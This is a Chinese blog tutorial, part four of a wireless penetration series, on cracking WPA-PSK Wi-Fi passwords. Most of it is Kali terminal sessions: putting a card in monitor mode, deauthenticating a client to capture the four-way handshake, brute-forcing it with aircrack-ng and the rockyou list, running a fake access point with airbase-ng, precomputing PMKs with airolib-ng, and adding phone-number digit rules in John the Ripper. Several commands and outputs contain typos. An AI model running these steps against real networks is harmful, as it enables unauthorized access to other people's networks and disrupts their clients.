无线渗透(四)WPA攻击

WPA PSK攻击
只有一种密码破解方法
WPA不存在WEP的弱点
只能暴力破解
CPU资源
时间
字典质量
网上共享的字典
泄露密码
地区电话号码段
Crunch生成字典
kali中自带的字典文件
WPA PSK攻击
PSK破解过程
开始抓包并保存
Deauthentication攻击获取4步握手信息
使用字典暴力破解
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
FID NAME
989 wpa_supplicant
1025 dhclient
root@kali:~# airmon-ng start wlan0
NO interfering processes found
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
root@kali:~# airodump-ng wlan0mon
root@kali:~# airodump-ng wlan0mon –bssid D4:EE:07:67:22:90 -c 11 -w wpa
root@kali:~# aireplay-ng -0 2 -a D4:EE:07:67:22:90 -c A4:50:46:E0:FA:06 wlan0mon
root@kali:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
root@kali:~# ls wpa*
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
root@kali:~# cd /usr/share/john/ 字典目录
root@kali:/usr/share/john# ls password.list
root@kali:/usr/share/john# more password.list
root@kali:/usr/share/john# grep Password password.list
Password
root@kali:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap
密码是Password
root@kali:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/ general/ Injections/ others/ stress/ vulns/ webservicces/
root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-playloads/ dbcs/ web-backdoors/ wordlists-user-passwd/
Discovery/ regex/ wordlists-misc/
root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/ wordlists-user-passwd/
root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt us_cities.txt wordlist-alpharumeric-case.txt wordlist-common-snmp-community-strings.txt wordlist-dns.txt
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls
john.txt phpbb.txt twltter.txt woksauce.txt
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd
root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
root@kali:~# cd /usr/share/
root@kali:/usr/share# ls
root@kali:/usr/share# cd wordlists/
root@kali:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt Fasttrack.txt fern-wifi metasploit metasploit-jtr namp.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz
root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r–r– 1 root root 53357341 3月 3 2013 rockyou.txt.gz
root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r–r– 1 root root 51M 3月 3 2013 rockyou.txt.gz
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt sqlmap.txt terminter.txt wfuzz
root@kali:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392
root@kali:/usr/share/wordlists#
aircrack-ng -w rockyou.txt /root/wpa-01.cap
密码是password
root@kali:~# airodump-ng –essid kifi wlan0mon
root@kali:~# airodump-ng –bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa
root@kali:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
root@kali:~# grep Password135 /usr/share/wordlists/rockyou.txt
WPA PSK攻击
无AP情况下的WPA密码破解
启动monitor
开始抓包并保存
根据probe信息伪造相同ESSID的AP
抓取四步握手中的前两个包
使用字典暴力破解
(E + PSK)经过4096次hash计算 = PMK
root@kali:~# airodump-ng wlan0mon
root@kali:~# rm wpa-01.*
root@kali:~# airodump-ng wlan0man
root@kali:~# airbase-ng -h
sage: airbase-ng <options> <replay interface>
Options
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to encrypt/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don’t] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages) (long –verbose)
-M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
-A : Ad-Hoc Mode (allows other clients to peer) (long –ad-hoc)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID (long –hidden)
-s : force shared key authentication
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte attack (long –caffe-latte)
-N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can’t be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
Filter options:
–bssid <MAC> : BSSID to filter/use (short -b)
–bssids <file> : read a list of BSSIDs out of that file (short -B)
–client <MAC> : MAC of client to accept (short -d)
–clients <file> : read a list of MACs out of that file (short -D)
–essid <ESSID> : specify a single ESSID (short -e)
–essids <file> : read a list of ESSIDs out of that file (short -E)
Help:
–help: Displays the usage screen (short -H)
# airbase-ng 使用笔记本的无线网卡伪造AP
root@kali:~# airbase-ng –essid lcon -c 11 wlan0mon //伪装AP
18:44:04 Created tap interface at0
18:44:04 Trying to set MTU on at0 to 1500
18:44:04 Trying to set MTU on wlan0mon to 1800
18:44:04 Access point with DSSID C8:3A:35:CA:46:91 started.
root@kali:~# tnux //分屏
root@kali:~# airbase –essid kifi -c 11 wlan0mon
# -z WPA1
root@kali:~# airbase –essid kifi -c 11 -z 2 wlan0mon
# -Z WPA2
root@kali:~# airbase –essid kifi -c 11 -Z 4 wlan0mon
root@kali:~# airodump-ng wlan0mon
root@kali:~# airodump-ng wlan0mon –essid kifi
root@kali:~# airodump-ng wlan0mon –essid kifi -w wpa
root@kali:~# airodump-ng wlan0mon –essid kifi -w wpa -c 11
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
AIROLIB破解密码
设计用于存储ESSID和密码列表
计算生成不变的PMK(计算资源消耗型)
PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)
通过完整性摘要值破解密码
SQLlite3数据库存储数据
AIROLIB破解密码
echo kifi > essid.txt
# 创建数据库
airolib-ng db –import essid essid.txt
# 查看当前数据库状态
airolib-ng db –stats
# 导入密码文件
airolib-ng db –import passwd <wordlist>
自动剔除不合格的WPA字典
# 批处理
airolib-ng db –batch
生成PMK
aircrack-ng -r db wpa.cap
root@kali:~# echo kifi > essid.txt
root@kali:~# cat essid.txt
kifi
root@kali:~# airolib-ng db –import essid essid.txt
root@kali:~# airolib-ng db –stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 (null)
root@kali:~# airolib-ng db –import passwd /usr/share/wordlists/rockyou.txt
root@kali:~# airolib-ng db –import passwd /usr/share/john/passwrod.lst
root@kali:~# airolib-ng db –stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 0.0
root@kali:~# airolib-ng –batch
Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.
root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait…
Aircack-ng 1.2 rc2
root@kali:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt
root@kali:~# more dict.txt
root@kali:~# airolib-ng db –import password dict.txt
Reading file
Writing…as read,121538 invalid lines ignored.
Done
root@kali:~# airolib-ng db –batch
JTR破解密码
John the ripper
快速的密码破解软件
支持基于规则扩展密码字典
很多人系统用手机号码做无线密码
获取号段并利用JTR规则增加最后几位的数字
配置文件/etc/john/john.conf
[list.Rules:Wordlist]
$[0-9]$[0-9]$[0-9]
root@kali:~# gedit
root@kali:~# top //系统的性能
root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait…
Aircack-ng 1.2 rc2
root@kali:~# cat yd.txt
root@kali:~# vim /etc/john/john.conf
/list.Rules:Wordlist
在最后加上密码规则
$[0-9]$[0-9]$[0-9]
JTR破解密码
测试效果
john –wordlist=passwrod.list –rules –stdout | grep -i Password123
破解调用
john –wroldlist=pass.list –rules –stdout | aricrack-ng -e kifi -w – wap.cap
北京联通手机号密码破解
root@kali:~# john –wordlist=yd.txt –rules –stdout
root@kali:~# ls yd.txt -lh
-rw-r–r– 1 root root 561 11月 10 19:57 yd.txt
root@kali:~# john –wroldlist=yd.txt –rules –stdout | aricrack-ng -e kifi -w – wap02.cap
posted @ 2019-03-12 22:23  micr067  阅读(173)  评论(0编辑  收藏  举报